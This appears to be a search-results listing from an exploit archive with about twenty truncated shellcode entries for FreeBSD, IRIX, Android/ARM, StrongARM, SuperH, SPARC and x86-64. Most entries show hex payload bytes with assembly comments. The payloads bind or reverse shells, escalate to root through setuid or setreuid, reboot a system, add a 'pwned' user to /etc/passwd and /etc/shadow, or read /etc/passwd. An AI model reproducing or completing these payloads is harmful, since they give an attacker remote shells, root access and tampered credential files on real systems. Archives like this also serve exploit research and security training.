7259 matches found
FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)
FreeBSD/x86 - Bind TCP 41254/TCP Shell /bin/sh Shellcode 115 bytes. Shellcode exploit for FreeBSDx86 platform / FreeBSD shellcode that binds /bin/sh to port 41254 Assembly code and explanation will be released on safemode.org soon. Written by zillion zillion at safemode.org / char shellcode =...
FreeBSD/x86 - reboot() Shellcode (15 bytes)
FreeBSD/x86 - reboot Shellcode 15 bytes. Shellcode exploit for FreeBSDx86 platform / FreeBSD reboot shellcode This will halt a system, which takes it offline until someone reboots it. Written by zillion at safemode.org / char shellcode =...
IRIX - execve(/bin/sh -c) Shellcode (72 bytes)
IRIX - execve/bin/sh -c Shellcode 72 bytes. Shellcode exploit for IRIX platform char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 /...
IRIX - execve(/bin/sh) Shellcode (43 bytes)
IRIX - execve/bin/sh Shellcode 43 bytes. Shellcode exploit for IRIX platform char shellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x02\x14" / addi $ra,$ra,532 / "\x23\xe4\xfe\x08" / addi $a0,$ra,-504 / "\x23\xe5\xfe\x10" / addi $a1,$ra,-496 /...
IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)
IRIX - Bind TCP Shell /bin/sh Shellcode 364 bytes. Shellcode exploit for IRIX platform / 364 byte MIPS/Irix PIC listening portshell shellcode. -scut/teso / unsigned long int shellcode = 0x2416fffd, / li $s6, -3 / 0x02c07027, / nor $t6, $s6, $zero / 0x01ce2025, / or $a0, $t6, $t6 / 0x01ce2825, / o...
IRIX - execve(/bin/sh) Shellcode (68 bytes)
IRIX - execve/bin/sh Shellcode 68 bytes. Shellcode exploit for IRIX platform / 68 byte MIPS/Irix PIC execve shellcode. -scut/teso / unsigned long int shellcode = 0xafa0fffc, / sw $zero, -4$sp / 0x24067350, / li $a2, 0x7350 / / dpatch: / 0x04d0ffff, / bltzal $a2, dpatch / 0x8fa6fffc, / lw $a2, -4$...
IRIX - stdin-read Shellcode (40 bytes)
IRIX - stdin-read Shellcode 40 bytes. Shellcode exploit for IRIX platform / 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso / unsigned long int shellcode = 0x24048cb0, / li $a0, -0x7350 / / dpatch: / 0x0490ffff, / bltzal $a0, dpatch / 0x2804ffff, / slti $a0, $zero, -1 / 0x240fffe3, / li $t...
Android/ARM - Reverse TCP (10.0.2.2:0x3412/TCP) Shell (/system/bin/sh) Shellcode (79 bytes)
Android/ARM - Reverse TCP 10.0.2.2:0x3412/TCP Shell /system/bin/sh Shellcode 79 bytes. Shellcode exploit for ARM platform / This ARM Thumb sc connects to a given IP and port with a shell. Intended for use with Android hence /system/bin/sh. Connects to the provided IP and port with a shell no null...
Linux/StrongARM - setuid() Shellcode (20 bytes)
Linux/StrongARM - setuid Shellcode 20 bytes. Shellcode exploit for ARM platform / 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r...
Linux/StrongARM - execve(/bin/sh) Shellcode (47 bytes)
Linux/StrongARM - execve/bin/sh Shellcode 47 bytes. Shellcode exploit for ARM platform / 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / st...
Linux/StrongARM - Bind TCP Shell (/bin/sh) Shellcode (203 bytes)
Linux/StrongARM - Bind TCP Shell /bin/sh Shellcode 203 bytes. Shellcode exploit for ARM platform / 203 byte StrongARM/Linux bind portshell shellcode funkysh / char shellcode= "\x20\x60\x8f\xe2" / add r6, pc, 32 / "\x07\x70\x47\xe0" / sub r7, r7, r7 / "\x01\x70\xc6\xe5" / strb r7, r6, 1 /...
Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)
Linux/SuperH sh4 - Bind TCP 31337/TCP Shell /bin/sh Shellcode 132 bytes. Shellcode exploit for SuperHSH4 platform / Bind /bin/sh on port 31337 SH4 - 132bytes Dad main: mov 102,r3 mov 2,r4 mov 1,r5 xor r6,r6 mov.l r6,@-r15 mov.l r5,@-r15 mov.l r4,@-r15 mov 1,r4 mov r15,r5 trapa 19 mov r0,r4 mov...
Linux/SPARC - setreuid(0,0) + execve(/bin/sh) Shellcode (64 bytes)
Linux/SPARC - setreuid0,0 + execve/bin/sh Shellcode 64 bytes. Shellcode exploit for LinuxSPARC platform / Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x0...
Linux/SPARC - setreuid(0,0) + execve() Shellcode (72 bytes)
Linux/SPARC - setreuid0,0 + execve Shellcode 72 bytes. Shellcode exploit for LinuxSPARC platform / Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; /...
Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode 27 bytes. Shellcode exploit for Linuxx86-64 platform / Execute /bin/sh - 27 bytes Dad 0x7ffff7aeff20 : mov eax,0x3b ; 0x7ffff7aeff25 : syscall ; main: ;mov rbx, 0x68732f6e69622f2f ;mov rbx, 0x68732f6e69622fff ;shr rbx, 0x8 ;mov rax, 0xdeadbeefcafe1dea ;mov...
Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)
Linux/x86-64 - Bind TCP 4444/TCP + Stager + Egghunter 0x64616564 Shellcode 157 bytes. Shellcode exploit for Linuxx86-64 platform ;Exam Assignment 3 ;implementation of egghunter ;Default egg = "deaddead" ; ;If connected the stager check of egg , if present execute the code ; ;You can send a maximu...
Linux/x86-64 - Add User (pwned/$pass$) Using open,write,close To /etc/{passwd,shadow} Shellcode (358 bytes)
Linux/x86-64 - Add User pwned/$pass$ Using open,write,close To /etc/passwd,shadow Shellcode 358 bytes. Shellcode exploit for Linuxx86-64 platform ; shellcode name adduserpasswordJCPopen,write,close ; Author : Christophe G SLAE64-1337 ; Len : 358 bytes ; Language : Nasm ; "name = pwned ; pass =...
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd,shadow} Shellcode (273 bytes)
Linux/x86-64 - Add User pwned/$pass$ Using echo cmd To /etc/passwd,shadow Shellcode 273 bytes. Shellcode exploit for Linuxx86-64 platform ; shellcode name adduserpassword ; Author : Christophe G SLAE64-1337 ; Len : 273 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and passwo...
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode 82 bytes. Shellcode exploit for Linuxx86-64 platform BITS 64 ; Author Mr.Un1k0d3r - RingZer0 Team ; Read /etc/passwd Linux x8664 Shellcode ; Shellcode size 82 bytes global start section .text start: jmp pushfilename readfile: ; syscall open file pop rdi ;...
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x86-64 - Bind TCP 4444/TCP Shell /bin/sh + Password Password Shellcode 173 bytes. Shellcode exploit for Linuxx86-64 platform ;BindTCP 4444 with password ; ;Default password = Password ; ;If connected the shellcode no prompt for password ; ;Enter password directly and you get the bin/sh shel...